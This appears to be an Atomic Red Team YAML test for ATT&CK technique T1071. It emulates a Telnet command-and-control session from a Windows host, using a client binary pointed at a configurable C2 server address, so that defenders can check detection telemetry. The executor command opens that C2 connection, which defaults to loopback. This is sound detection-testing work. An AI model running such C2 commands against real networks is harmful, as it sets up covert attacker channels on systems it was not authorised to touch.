03464493cc
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
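# Atomic test definition for ATT&CK technique T1071 (Application Layer
# Protocol). The single test emulates a Telnet command-and-control session
# from a Windows endpoint so that network and process telemetry for it can
# be checked. Tokens written as #{name} are filled from input_arguments.
attack_technique: T1071
display_name: 'Application Layer Protocol'
atomic_tests:
  - name: Telnet C2
    auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
    description: |
      An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
    supported_platforms:
      - windows
    dependency_executor_name: powershell
    dependencies:
      # Reachability check only: a successful TCP connect shows that something
      # is listening on the port, not that the listener is telnet_server.exe.
      - description: |
          A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
        prereq_command: |
          $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
          if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
        get_prereq_command: |
          Write-Host "Setup C2 server manually"
      # The executor launches the client binary directly, so a missing file
      # should fail the prerequisite check rather than the test run itself.
      - description: |
          The Telnet client binary must exist on disk at the configured client path (#{client_path})
        prereq_command: |
          if (Test-Path "#{client_path}") {exit 0} else {exit 1}
        get_prereq_command: |
          Write-Host "Place telnet_client.exe at #{client_path} manually"
    input_arguments:
      # NOTE(review): the declared type is url while the default is a bare IP
      # address; the description allows either form.
      # The default is the loopback address, so the connection stays on the
      # local host until this argument is overridden.
      server_ip:
        description: C2 server IP or URL
        type: url
        default: 127.0.0.1  # Replace "127.0.0.1" with the actual IP or URL
      client_path:
        description: Client agent path
        type: path
        default: PathToAtomicsFolder\T1071\bin\telnet_client.exe  # Update the path if needed
      # 23 is the standard Telnet port; outbound connections to it from a
      # workstation are a useful signal to check detections against.
      server_port:
        description: C2 server port
        type: integer
        default: 23
    executor:
      # The client path is substituted unquoted, so a client_path containing
      # spaces will not be invoked correctly by PowerShell.
      # If the client speaks standard Telnet the session is unencrypted and
      # its content is visible to network sensors.
      # NOTE(review): no cleanup_command is defined; confirm that the client
      # process exits on its own when the session ends.
      command: |
        #{client_path} #{server_ip} --port #{server_port}
      name: powershell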